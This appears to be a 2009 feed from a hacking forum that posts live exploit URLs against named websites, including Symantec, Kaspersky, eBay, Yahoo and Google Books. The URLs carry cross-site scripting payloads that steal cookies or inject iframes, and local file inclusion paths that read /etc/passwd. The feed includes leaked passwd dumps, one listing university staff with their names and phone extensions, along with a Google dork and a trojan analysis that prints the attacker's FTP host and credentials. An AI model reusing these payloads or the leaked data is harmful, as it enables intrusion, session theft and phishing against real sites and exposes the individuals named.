    root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin brugo:x:500:500::/home/brugo:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash digitalid:x:501:501::/home/digitalid:/bin/sh brugoweb:x:502:502::/home/brugoweb:/bin/sh ilias:x:503:503::/home/ilias:/bin/sh db:x:504:504::/home/db:/bin/bash streamrep:x:505:505::/home/streamrep:/bin/sh morin:x:506:506::/home/morin:/bin/sh operalib:x:507:507::/home/operalib:/bin/sh francese:x:508:508::/home/francese:/bin/sh karascio:x:509:509::/home/karascio:/bin/sh podcast:x:510:510::/home/podcast:/bin/sh lazzaristat:x:511:511::/home/lazzaristat:/bin/sh ibm:x:512:512::/home/ibm:/bin/bash medusa:x:513:513::/home/medusa:/bin/sh matnet:x:514:514::/home/matnet:/bin/sh stats:x:515:515::/home/stats:/bin/sh migranti:x:516:516::/home/migranti:/bin/sh icsbellano:x:517:517::/home/icsbellano:/bin/bash

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Wed, 25 Mar 2009 10:40:37 GMT 1675266179
    <![CDATA[Hubpinger.ro - XSS -Iframe url injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.hubpinger.ro/rezultate_cautare.php?q="><script>alert(String.fromCharCode(88,83,83))</script>


    Code:
    http://www.hubpinger.ro/rezultate_cautare.php?q=><iframe%20src=http://nemesis.te-home.net></iframe>

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 29 Mar 2009 20:01:51 GMT 601698758
    <![CDATA[Clax.ro -SQL Injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31003_SQL_Injection/ http://img147.imageshack.us/img147/9643/71515762.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31003_SQL_Injection/ Sun, 29 Mar 2009 20:19:09 GMT 53923663
    <![CDATA[Turnkey Ebook Store v1.1 - XSS + Redirect]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ http://www.privatelabelresellrights-store.com/ebookstore/

    example:

    - http://site.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>  

    - http://site.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">

    live:

    - http://1dollar-ebookstore.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>


    Google dork: - Powered by Turnkey Ebook Store v1.1







    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 31 Mar 2009 11:31:21 GMT 153377682
    <![CDATA[Multiple Bugs On EBAY.CO.UK Website]]> http://nemesis.te-home.net/ XSS and Iframe URL Injection

    Malicious people can inject JavaScript code to redirect users to eBay scam pages (phishing attacks)


    http://img65.imageshack.us/img65/4685/71142623.jpg
      

    http://img4.imageshack.us/img4/187/45532236.jpg  


    - Redirect to others url works fine also



    Local File Inclusion   ( traversal attacks )

    Attackers use directory traversal attacks to read arbitrary files on web servers, such as SSL private keys and password files.


    http://img65.imageshack.us/img65/9983/88164824.jpg

    http://img65.imageshack.us/img65/8361/50811929.jpg


    The webmaster has been alerted about this BUT I have not received any response,so maybe all bugs still works !

    http://img6.imageshack.us/img6/9329/70010621.jpg
    ]]>
    http://nemesis.te-home.net/ Fri, 3 Apr 2009 12:43:53 GMT 778580481
    <![CDATA[ssnet.ro - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.ssnet.ro/cart.php?a=add&pid="><script>alert(12157312.477)</script>/code]

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sat, 4 Apr 2009 12:47:30 GMT 3267603179
    <![CDATA[caffedelmar.ro VHC - LFI]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
    Code:
    http://www.caffedelmar.ro/cafe/?page=../../../../../../etc/passwd%00


    Quote:
    root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false cafe:x:1000:100:,,,:/home/cafe:/bin/bash elgreco:x:1001:100:,,,:/var/www/htdocs/cafedelmar:/bin/bash
    VerliHub Control Panel v 1.7c Branch PHP 5.x Project by XngR and developed by netcelli

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 7 Apr 2009 15:47:17 GMT 2247780117
    <![CDATA[Gantep.edu.tr ]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
    Code:
    http://www1.gantep.edu.tr/~andrew/ep208/exercises?lecture=../../../../../../etc/passwd%00


    Quote:
    root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false template:x:11204:100::/home/template:/bin/bash andrew:x:1001:100:Dr Andrew Beddall,206,ext 2206/2202,Engineering Physics:/home/andrew:/bin/bash c_dikici:x:1073:100:Celal Dikici,BIM,ext 1951,Industry Engineering:/home/c_dikici:/bin/bash akcevik:x:10383:100:Abdulkadir Cevik,201,ext 2409,Civil Engineering:/home/akcevik:/bin/bash arif1:x:10277:100:Prof Arif Nacaroglu,,,:/home/arif1:/bin/bash ayilmaz:x:10142:100:Dr Mustafa Yilmaz,207,ext 2210,Engineering Physics:/home/ayilmaz:/bin/bash baykasoglu:x:10326:100:Dr Adil Baykasoglu,310,ext 2603,Industrial Engineering:/home/baykasoglu:/bin/bash beddall:x:1036:100:Dr Ayda Beddall,214/206,ext 2202/2206,Physics:/home/beddall:/bin/bash belibagli:x:10730:100:Dr.Bulent Belibagli,Food,,:/home/belibagli:/bin/bash bingul:x:10046:100:Ahmet Bingul,1/1,2200,Physics:/home/bingul:/bin/bash eakay:x:11033:100:Ogr.Gor.Ersin Akay,iibf,4290,:/home/eakay:/bin/bash erklig:x:1020:100:Ahmet Erklig,313,ext 2524/2513,Mechanical Engineering:/home/erklig:/bin/bash genseksek:x:11126:100:Genel Sekreterlik,idari,,:/home/genseksek:/bin/bash gonul:x:10176:100:Prof. Bulent Gonul,Physics,,:/home/gonul:/bin/bash avsar:x:1216:100:Ilker Ibrahim Avsar,MYO,4752,:/home/avsar:/bin/bash inal:x:11139:100:Uzman Oguz Inal,myo,1700,:/home/inal:/bin/bash kanber:x:10303:100:Dr Bahattin Kanber,209,ext 2577,Mechanical Engineering:/home/kanber:/bin/bash kutuk:x:10328:100:M.Akif KUTUK,316,ext 2571,Mechanical Engineering:/home/kutuk:/bin/bash mahsereci:x:11140:100:Ogr.Gor.Esra Mahsereci,myo,1700,:/home/mahsereci:/bin/bash mtgogus:x:10297:100:Mehmet Tolga Gogus,Z06,ext 2425,Civil Engineering Dept.:/home/mtgogus:/bin/bash nnacar:x:10147:100:Nuri Nacar,BIM,1950,:/home/nnacar:/bin/bash oduncuoglu:x:10056:100:Murat Oduncuoglu,Physics,,:/home/oduncuoglu:/bin/bash erkmen:x:10018:100:Prof. Osman ERKMEN,313/235,ext 2313/2335,Food Engineering:/home/erkmen:/bin/bash ozer:x:10053:100:Dr Okan Ozer,2/2,ext 2218,Engineering of Physics:/home/ozer:/bin/bash parlakyigit:x:10785:100:Ars. Gor. Pinar Parlakyigit,,,Textile Engineering,,:/home/parlakyigit:/bin/bash sibanoglu:x:10363:100:Dr Senol Ibanoglu,315,ext 2315,Food Eng.:/home/sibanoglu:/bin/bash sonercan:x:10573:100:Bilg.Isl.Mehmet Sonercan,Bim,1567,:/home/sonercan:/bin/bash taysi:x:10263:100:Arț.Gör.Nildem Tayți,110,ext 2422,Civil Engineering:/home/taysi:/bin/bash tuluce:x:11096:100:Ars.Gor.Hatice Kubra,Teng,,:/home/tuluce:/bin/bash varisoglu:x:10742:100:Ogr.Gor.Mehmet Celal

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 7 Apr 2009 15:50:47 GMT 1183190080
    <![CDATA[Rapowder.ch]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
    Code:
    http://www.rapowder.ch/www/frame.php?title=Links%20Admin&url=http://nemesis.te-home.net/Forum/



    http://img530.imageshack.us/img530/4144/66812082.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 7 Apr 2009 15:57:29 GMT 857462338
    <![CDATA[Metasploit Decloaking Engine and TOR]]> http://nemesis.te-home.net/ https://www.torproject.org

    https://www.torproject.org/ wrote:
    Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.

    Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. Tor works with many of your existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol.

    Hundreds of thousands of people around the world use Tor for a wide variety of reasons: journalists and bloggers, human rights workers, law enforcement officers, soldiers, corporations, citizens of repressive regimes, and just ordinary citizens. See the Who Uses Tor? page for examples of typical Tor users. See the overview page for a more detailed explanation of what Tor does, and why this diversity of users is important.

    Tor doesn't magically encrypt all of your Internet activities, though. You should understand what Tor does and does not do for you.


            There are a lot of known attacks against TOR users to find their real IP, most of them rely on the fact that javascript, vbscript, plugins, etc. are not restricted by browser's settings so they can be used to bypass proxy restrictions or to reveal the local IP. Metasploit Decloaking Engine is a public service that can be called by websites to reveal the real IP of their users.

    http://decloak.net/ wrote:
    Metasploit Decloaking Engine

    This tool demonstrates a system for identifying the real IP address of a web user, regardless of proxy settings, using a combination of client-side technologies and custom services. No vulnerabilities are exploited by this tool. A properly configured Tor setup should not result in any identifying information being exposed.

    It is now possible to embed the decloaking engine into third-party web sites, using the services hosted at decloak.net. This is a great way to track down abusive users or verify the privacy settings of your site's visitors.


            Testing this service with a proxy set in browser and javascript and plugins enabled shows that it indeed can reveal your real IP. Disabling browser extensions and scripting reduces the functionality of most websites and/or makes them inaccessible. What can be done to reduce the risk of a website finding your real IP using one of these techniques if you use a proxy ?

            Advanced TOR is a new project which will be added here in the next days. It is based on TOR and its purpose is to make TOR more accessible and more resource friendly for Windows users without the need for an external program or an extra configuration port open to control its behaviour. Also, for some applications that don't have support for using proxies it can "force" them to use TOR. With the original Vidalia+TOR+Privoxy bundle you have 3 opened ports (9050 - socks4/5, 9051 - control port, 8118 - HTTP proxy port). With Advanced TOR you have only 1 port open (default is 9050 - 127.0.0.1:9050 ) which can be used for Socks5 , Socks4 and HTTP / HTTP CONNECT proxy. It has a GUI so there is no need for an extra configuration port (it can still be opened if needed).
            The "Force TOR" option can also be used with a browser that already uses TOR as proxy, to force scripts and extensions to use TOR. Testing Metasploit Decloaking Engine with TOR set as proxy and with "Force TOR" set for browser's process has the following result:

    Advanced TOR wrote:
    [06:59:39] [notice] Tor v0.2.1.13-alpha. This is experimental software. Do not rely on it for strong anonymity. (Running on Windows XP Service Pack 2 [workstation] {terminal services, single user})
    [06:59:42] [notice] We now have enough directory information to build circuits.
    [06:59:42] [notice] Bootstrapped 80%: Connecting to the Tor network.
    [06:59:42] [notice] Bootstrapped 85%: Finishing handshake with first hop.
    [06:59:45] [notice] Bootstrapped 90%: Establishing a Tor circuit.
    [06:59:50] [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
    [06:59:50] [notice] Bootstrapped 100%: Connected to TOR network..
    [06:59:51] [proxy] Connection request for decloak.net:80 .
    [06:59:53] [proxy] Connection request for decloak.net:80 .
    [06:59:53] [proxy] Connection request for decloak.net:80 .
    [06:59:53] [proxy] Connection request for decloak.net:80 .
    [06:59:55] [proxy] Connection request for decloak.net:80 .
    [07:00:00] [proxy] Connection request for decloak.net:80 .
    [07:00:00] [proxy] Connection request for decloak.net:80 .
    [07:00:04] [proxy] Connection request for decloak.net:80 .
    [07:00:06] [proxy] Connection request for decloak.net:80 .
    [07:00:06] [proxy] Connection request for decloak.net:80 .
    [07:00:06] [proxy] Connection request for decloak.net:80 .
    [07:00:07] [proxy] Connection request for decloak.net:80 .
    [07:00:08] [proxy] Connection request for fdcce6def5973cfe6316c165782e2e9f.http.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
    [07:00:09] [proxy] Connection request for decloak.net:80 .
    [07:00:09] [proxy] Connection request for decloak.net:80 .
    [07:00:11] [proxy] Connection request for fdcce6def5973cfe6316c165782e2e9f.quicktime.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
    [07:00:14] [proxy] Connection request for decloak.net:80 .
    [07:00:16] [proxy] Connection request for decloak.net:80 .
    [07:00:17] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:843 .
    [07:00:17] [proxy] Connection request for 66.240.213.71:843 .
    [07:00:19] [proxy] Connection request for decloak.net:80 .
    [07:00:19] [proxy] Connection request for decloak.net:80 .
    [07:00:19] [proxy] Connection request for decloak.net:80 .
    [07:00:19] [proxy] Connection request for decloak.net:80 .
    [07:00:20] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:53530 .
    [07:00:20] [proxy] Connection request for 66.240.213.71:53530 .
    [07:00:21] [proxy] Connection request for decloak.net:80 .
    [07:00:23] [proxy] Connection request for decloak.net:80 .
    [07:00:24] [proxy] Connection request for decloak.net:80 .
    [07:00:24] [proxy] Connection request for decloak.net:80 .
    [07:00:24] [proxy] Connection request for decloak.net:80 .
    [07:00:26] [proxy] Connection request for 728c11eaf8a985be011aa3739598b520.http.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
    [07:00:35] [proxy] Connection request for decloak.net:80 .
    [07:00:35] [proxy] Connection request for decloak.net:80 .
    [07:00:35] [proxy] Connection request for decloak.net:80 .
    [07:00:35] [proxy] Connection request for decloak.net:80 .
    [07:00:38] [proxy] Connection request for 728c11eaf8a985be011aa3739598b520.quicktime.85.25.145.98.0.0.0.0.spy.decloak.net:80 .
    [07:00:48] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:843 .
    [07:00:48] [proxy] Connection request for 66.240.213.71:843 .
    [07:00:49] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:53530 .
    [07:00:49] [proxy] Connection request for 66.240.213.71:53530 .
    [07:00:52] [proxy] Attempt to bypass proxy settings with address  66.240.213.71:53530 .
    [07:00:52] [proxy] Connection request for 66.240.213.71:53530 .
    [07:01:05] [proxy] Connection request for decloak.net:80 .
    [07:01:07] [proxy] Connection request for decloak.net:80 .
    [07:01:07] [proxy] Connection request for decloak.net:80 .
    [07:01:07] [proxy] Connection request for decloak.net:80 .
    [07:01:07] [proxy] Connection request for decloak.net:80 .
    [07:01:09] [proxy] Connection request for decloak.net:80 .
    [07:01:28] [proxy] Connection request for decloak.net:80 .
    [07:01:31] [proxy] Connection request for decloak.net:80 .
    [07:01:32] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .
    [07:01:33] [proxy] Connection request for decloak.net:80 .


    http://img27.imageshack.us/img27/1056/decloak.gif


            The "Force TOR" option needs AdvTor.dll which sets hooks on Winsock functions gethostname - which always returns a fake hostname to prevent the program from finding local IP , connect and WSAConnect which will make the connections use TOR's proxy. Current version of AdvTor.dll works with Windows 2000 and XP, and doesn't work with programs that use WSAAsyncSelect. On request, more OS'es will be supported, and maybe its functions will be added to ddosflt to be able to force also services and svchost'ed services to use TOR.
            The project is currently in beta, and it will be added on this website when enough options are added to GUI to make it usefull without editing configuration files (which are located in TOR's directory). For those who want to test what has been done so far, a beta version is available here: http://nemesis.te-home.net/Files/AdvTor/AdvTor.zip.
    ]]>
    http://nemesis.te-home.net/ Tue, 7 Apr 2009 16:43:40 GMT 2381848065
    <![CDATA[MaxMind.com - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.maxmind.com/app/locate_ip?ips="></noscript><script>alert('XSS')</script><!-

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 7 Apr 2009 18:19:49 GMT 335958548
    <![CDATA[New Cross site Scripting Vulnerability on kaspersky]]> http://nemesis.te-home.net/index.html This time on Russian Support http://support.kaspersky.ru



    Works fine on Firefox,Opera and IE.  


    XSS

    Code:
    http://support.kaspersky.ru/virlab/helpdesk.html?LANG=pl}"><script>alert("XSS by Teamelite")</script>
       

    http://img26.imageshack.us/img26/7060/15414499.jpg


    Iframe Url Injection

    Code:
    http://support.kaspersky.ru/virlab/helpdesk.html?LANG=pl}"><iframe src=http://nemesis.te-home.net/index.html?news></iframe>
      

    http://img26.imageshack.us/img26/226/46451020.jpg  

    And Just For Fun with Mr. Eugene Kaspersy =))

    http://img147.imageshack.us/img147/7348/24735664.jpg


    More about Kaspersky Bugs

    http://nemesis.te-home.net/Forum/3100_Bad_Settings/20090320_Kaspersky_Returns.html

    http://nemesis.te-home.net/Forum/3100_Bad_Settings/20090320_Other_Bad_Security_Settings_on_Kaspersky_s_Website.html

    http://nemesis.te-home.net/News/Kaspersky_still_Insecure.html
    ]]>
    http://nemesis.te-home.net/index.html Thu, 9 Apr 2009 12:39:00 GMT 323695937
    <![CDATA[Symantec Website Open to XSS Vulnerability]]> http://nemesis.te-home.net/index.html http://www.symantec.com

    Simple XSS alert

    Code:
    http://www.symantec.com/connect/search-connect?page=8&terms="><script>alert(String.fromCharCode(88,83,83))</script>


    http://img515.imageshack.us/img515/6321/34786644.jpg

    Document Cookie

    Code:
    http://www.symantec.com/connect/search-connect?page=8&terms=virus&community_id=&utility_id="><script>alert(document.cookie)</script>


    http://img515.imageshack.us/img515/1700/57245987.jpg

    Iframe URL injection

    Code:
    http://www.symantec.com/connect/search-connect?page=8&terms="><iframe src=http://img164.imageshack.us/img164/899/63094193mx7.jpg></iframe>


    http://img515.imageshack.us/img515/4867/68574000.jpg


    Secure Symantec Staff has been alerted about the issue.
    ]]>
    http://nemesis.te-home.net/index.html Wed, 15 Apr 2009 17:32:33 GMT 1313933781
    <![CDATA[Avanced TOR (Windows only)]]> http://nemesis.te-home.net/ Advanced TOR, an improved alternative for Tor+Vidalia+Privoxy bundle for Windows users.
    http://nemesis.te-home.net/Files/AdvTor/hackademix.gif
            Some of the new features added to Advanced TOR include support for HTTP/HTTPS proxy on same Socks4/Socks5 port, a User Iterface which makes all Tor available options more accessible, local banlist for forbidden addresses and the ability to "force" a program and its extensions / plugins to use the Tor proxy regardless of its configured proxy settings. More features will be added in next versions.
            Project links:
    ]]>
    http://nemesis.te-home.net/ Fri, 17 Apr 2009 18:02:18 GMT 1605343087
    <![CDATA[DCinfo.org - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/

    http://www.dcinfo.org/hublist.php?sort=hubname&st="><iframe src=http://img164.imageshack.us/img164/899/63094193mx7.jpg></iframe> [/URL]

    Code:
    http://www.dcinfo.org/hublist.php?sort=hubname&st="><body+onload=alert(/teamelite/)>&popup=true

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sat, 18 Apr 2009 14:28:19 GMT 3603458839
    <![CDATA[Spanish Ebay Vulnerable to XSS]]> http://nemesis.te-home.net/index.html

    Simple XSS alert

    http://img17.imageshack.us/img17/4879/70926857.jpg



    Iframe url injection

    http://img17.imageshack.us/img17/9269/12931248.jpg



    Document cookie

    http://img12.imageshack.us/img12/6711/46226894.jpg



    Also redirect works fine


    Some others bugs on ebay http://nemesis.te-home.net/News/20090403_Multiple_Bugs_On_EBAY_CO_UK_Website.html

    ]]>
    http://nemesis.te-home.net/index.html Mon, 20 Apr 2009 10:02:53 GMT 420059399
    <![CDATA[Updates and fixes on QSDChublist.com]]> http://nemesis.te-home.net/

    • Added: Totalshare in hubdetails
    • Removed: Xss bug in the language system reported by Methodman


    Pinger updates:

    • Added: Calculation of totalshare
    • Added: Supernova detection and reporting. (Thx to Lord_Zero)



    Project website: www.QSDCHublist.com
    ]]>
    http://nemesis.te-home.net/ Wed, 22 Apr 2009 18:10:42 GMT 3684017985
    <![CDATA[Theregister.co.uk - XSS ]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/
    So now I can show some screens :)

    http://img141.imageshack.us/img141/3089/72550589.jpg

    http://img141.imageshack.us/img141/5494/83863823.jpg  
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/ Wed, 22 Apr 2009 19:20:06 GMT 1308207868
    <![CDATA[Netcraft Vulnerable to XSS]]> http://nemesis.te-home.net/index.html
    http://news.netcraft.com/about-netcraft


    Code:
    http://searchdns.netcraft.com/?host=google'"></title><script>alert(1337)</script>><marquee><h1>XSS by teamelite</h1></marquee>


    http://img91.imageshack.us/img91/4231/13019814.jpg


    Code:
    http://searchdns.netcraft.com/?host=google'"></title><script>alert(1337)</script>'"><marquee><h1>"><script>alert(String.fromCharCode(88,83,83))</script>/h1></marquee>
      


    http://img91.imageshack.us/img91/8910/13857027.jpg


    webmaster has been alerted... xss bug was fixed but still any response ... anyway .. maybe next time :)
    ]]>
    http://nemesis.te-home.net/index.html Thu, 23 Apr 2009 09:10:49 GMT 66169526
    <![CDATA[technewsworld.com - xss]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.technewsworld.com/perl/search.pl?&query=F-Secure&init=60"><script>alert(document.cookie)</script>

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sat, 25 Apr 2009 14:52:42 GMT 4164513551
    <![CDATA[New XSS Bug on Yahoo]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Buzz yahoo Vulnerable to xss attack

    Code:
    http://buzz.yahoo.com/article/1:cnet_news406:91557c7e67c73cf69b8d944106082074/F-Secure-says-stop-using-Adobe-Acrobat-Reader?action=share&sharedasset=article%2F1:cnet_news406:91557c7e67c73cf69b8d944106082074'"></title><script>alert(1337)</script>><marquee><h1>XSS-BY-Methodman</h1></marquee>


    Screen:

    http://img17.imageshack.us/img17/5395/29496070.jpg
    http://img17.imageshack.us/img17/1788/87773680.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 28 Apr 2009 09:32:37 GMT 4227994071
    <![CDATA[Critical XSS bug in Google Book Search]]> http://nemesis.te-home.net/ Google Book Search:

    Pierre_gardenat wrote:
    Critical XSS vulnerability in Google book search service :
    PoC :
    Code:
    http://www.google.com/books?q=%22%27/%3E%3Cscript%3Ealert(String.fromCharCode(72,69,76,76,79,32,80,73,69,82,82,69))%3C/script%3E

    This vulnerability can be used to display sensitive information :
    Code:
    http://www.google.com/books?q=%22%27/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    And can be combined with Google SSO to launch phishing attacks :
    Code:
    https://www.google.com/accounts/Login?service=print&continue=http://www.google.com/books%3Fq%3D%2522%27/%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E%26hl%3Dfr&hl=fr

    Of course, you can also inject external frames and play with DOM content under certain conditions :
    Code:
    http://www.google.com/books?q=%22%3Ciframe%20src=index.htm


    Google has fixed this flaw now.


            To learn more about XSS attacks, the risks associated with them and their evolution, follow Pierre Gardenat's presentation at SSTIC 09 French Conference - Rennes 3,4 and 5th June 2009 (http://www.sstic.org/SSTIC09/info.do).
    ]]>
    http://nemesis.te-home.net/ Tue, 28 Apr 2009 20:08:32 GMT 3954820196
    <![CDATA[Hidden installers and "Server 89.exe"]]> http://nemesis.te-home.net/Forum/3000_News/ releases" on file sharing websites. Most infected files are NSIS installers that silently extract and execute 2 files, one of them is "Server 89.exe" and the other may be a shareware program or a key generator, a freeware program or a WinRAR self-extracting archive that extracts a document, avi or mp3 (as in "filename.avi.exe"). NSIS installers can be extracted without executing them using a freeware archiver like 7Zip.

    Server 89.exe is a trojan that saves all locally stored password to a file called u16event.dat in Temp directory, sends the file to a ftp and deletes itself (cmd /c timeout 5 && del "Server 89.exe"). The "encryption" method used for strings found in trojan executable is simple - string[i]^=i%5; , all strings preceeded by a character with code 1. The passwords for Msn Messenger, Google Talk, Trillian, Yahoo Messenger, Aim Messenger, Pidgin Chat Client, Steam, No-Ip Duc, DynDns Updater, Firefox 2 / 3 stored passwords, Internet Explorer 7 / 8 stored passwords and FileZilla's stored passwords are saved as a HTML formatted table, having these columns: Program , Protocol / Url , Username and Password.

    Code:
    <table width='80%' align='center' cellpadding='3px' style='border:1px solid #BFDFFE; background:#EEEEEE;'>

    <tr style='background:#BFDFFE; font-weight:bold;'><td>Program</td><td>Protocol / Url</td><td>Username</td><td>Password</td></tr>

    </table>


    The HTML table with all passwords is then sent to ftp://89.248.160.215 (sv4.altushost.com) where the trojan uploads the file using this account: hellokon@idownloader.net , password 0321287975703333009705 (http://www.idownloader.net is on same host).
    As antiviruses add detection for this trojan, new versions are made to avoid detection, all of them upload to the same host using same account.
    Do not execute any downloaded executable file without scanning it with an antivirus. We recommend you to send suspicious files to a service like http://www.virustotal.com which uses more antivirus engines to scan a file and all files are sent to antivirus companies to improve detection.
    ]]>
